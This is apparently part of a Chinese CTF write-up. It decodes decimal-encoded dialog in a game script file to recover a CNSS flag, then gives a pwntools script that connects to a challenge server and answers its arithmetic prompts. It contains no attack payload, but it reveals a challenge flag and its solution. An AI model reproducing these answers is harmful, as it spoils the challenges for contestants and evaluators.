main_107@act_se^filename@121117107117109111095048048050052046109112051#vol@056048048^^main_109@act_dialog^^^0^^049048055045048
main_109@act_dialog^^^main_111@act_se^^^0^^229143175231136177231154132229165179229173169058227128142230152175231154132239188140230136145229176177230152175032067078083083032229168152229147166227128130227128143013010035048
main_111@act_se^filename@121117107117109111095048048050053046109112051#vol@056048048^^main_113@act_dialog^^^0^^049049049045048
main_113@act_dialog^^^main_115@act_se^^^0^^067078083083032229168152058227128142230136145228187172229135157232129154231189145231187156229174137229133168229183165228189156229174164230172162232191142230175143228184128228189141229175185231189145231187156229174137229133168230136150229188128229143145232191144231187180230132159229133180232182163231154132230150176231148159229138155233135143229138160229133165239188129227128143013010035048
main_115@act_se^filename@121117107117109111095048048050054046109112051#vol@056048048^^main_117@act_dialog^^^0^^049049053045048
main_117@act_dialog^^^main_119@act_se^^^0^^067078083083032229168152058227128142229185182228184141230152175228187128228185136229143175230128149231154132233130170230149153231187132231187135229147166239188129227128143013010035048
main_119@act_se^filename@121117107117109111095048048050055046109112051#vol@056048048^^main_121@act_dialog^^^0^^049049057045048
main_121@act_dialog^^^main_123@act_se^^^0^^067078083083032229168152058227128142232175180228186134232191153228185136229164154239188140229133182229174158228189160230160185230156172228184141229156168230132143230136145228187172229134153228186134228187128228185136229137167230156172239188140228189160229133179229191131231154132229143170230156137032102108097103032229175185229144167239188129227128143013010035048
main_123@act_se^filename@121117107117109111095048048050056046109112051#vol@056048048^^main_125@act_dialog^^^0^^049050051045048
main_125@act_dialog^^^main_127@act_se^^^0^^067078083083032229168152058227128142230136145232191153229176177229145138232175137228189160229147166239188129227128143013010035048
main_127@act_se^filename@121117107117109111095048048050057046109112051#vol@056048048^^main_129@act_dialog^^^0^^049050055045048
main_129@act_dialog^^^main_131@act_deletecstand^^^0^^083104105110111058227128142229165185230173163229156168230130132230130132230139137232191145229146140230136145231154132232183157231166187046046046229165189231180167229188160239188129227128143013010035048
main_131@act_deletecstand^id@048^^main_132@act_picture^^^0^^049051049045048
main_132@act_picture^id@048#filename@067078083083095112110103046112110103#x@053048048#y@051048048#opacity@049#xscale@049046051#yscale@049046051#ro@048^^main_133@act_se^^^0^^049051050045048
main_133@act_se^filename@121117107117109111095048048051048046109112051#vol@056048048^^main_135@act_dialog^^^0^^049051051045048
main_135@act_dialog^^^main_137@act_se^^^0^^083104105110111058227128142230157165229136176229175185232175157230161134229137141233157162228186134239188129227128143013010035048
main_137@act_se^filename@121117107117109111095048048051049046109112051#vol@056048048^^main_139@act_dialog^^^0^^049051055045048
main_139@act_dialog^^^main_142@act_dialog^^^0^^067078083083032229168152058227128142102108097103229176177230152175226128148226128148239188129102108097103230152175099110115115123087048119033089048117095052114101095075049110103095048102095082051086051051115051051095033033033033033033125229147166239188129232174176228189143228186134229144151239188159227128143013010035049
main_142@act_dialog^^^main_144@act_deletepicture^^^0^^067078083083032229168152058227128142229191171229142187230143144228186164229144167239188129227128143013010035048
main_144@act_deletepicture^id@048^^main_145@act_se^^^0^^049052052045048
main_145@act_se^filename@121117107117109111095048048051050046109112051#vol@056048048^^main_147@act_dialog^^^0^^049052053045048
main_147@act_dialog^^^main_150@act_dialog^^^0^^083104105110111058227128142046046046046231173137231173137239188140229165185232175180228186134229149165239188159227128143013010035049
main_150@act_dialog^^^main_152@act_shutdown^^^0^^045045084072069032069078068045045013010035048
main_152@act_shutdown^^^^^^0^^049053050045048
main_155@act_function^sign@114099108105099107040041^^^main_157@act_endfunction^^1^^049053053045048
main_157@act_endfunction^^^^^^0^^049053055045048
然后去官方的技术文档那搜索了一下
符号“@”表示当前行是可执行命令,Action是命令名称,ParameterName是命令参数的名字,ParameterValueExpression是要赋值给等号左侧参数的表达式,省略号表示一个命令既可以没有<参数, 值>对,也可以有多个<参数, 值>对。注意到,一个命令如果带有多个参数时,参数是没有先后顺序要求的;而符号“#”表明当前行是注释,编译器在做语法分析时将略过它;推导符号Dialog代表在游戏执行过程中要显示的文本,这是AVG游戏使用频率最高的命令,由于文本的显示存在跨行的情况,因此它以一种上下文有关文法来表示
Dialog是文本框相关的,然后这些数字也有规律三个一组的像ascii码一样的,然后尝试搜cnss{的ascii码099110115115123搜到了,把后面的字符串拷贝下来然后python三个三个读拿到flag cnss{W0w!Y0u_4re_K1ng_0f_R3V33s33_!!!!!!}
s = "099110115115123087048119033089048117095052114101095075049110103095048102095082051086051051115051051095033033033033033033125229147166239188129232174176228189143228186134229144151239188159227128143013010035049"
for i in range(0,len(s),3):
print(chr(int(s[i:i+3])),end="")
pwn
🎮 nc,启动
nc连
😡 让我访问!!!
pwntools
from pwn import *
import re
host,port = "43.156.14.141",1141
p = remote(host,port)
p.recvuntil(b"(y/n)\n")
p.sendline(b"y")
p.recvuntil(b"(y/n)\n")
p.sendline(b"y")
for i in range(100):
string = p.recvline().decode('utf-8')
n1,operator,n2 = re.findall(r'(\d+|\+|\-|\*|\/)', string)
n1,n2 = int(n1),int(n2)
if operator == "+":
tmp = str(n1 + n2)
p.sendline(tmp.encode('utf-8'))
continue
else:
tmp = str(n1 - n2)
p.sendline(tmp.encode('utf-8'))
continue
while 1:
ss = input()
p.sendline(ss.encode('utf-8'))
print(p.recvline())
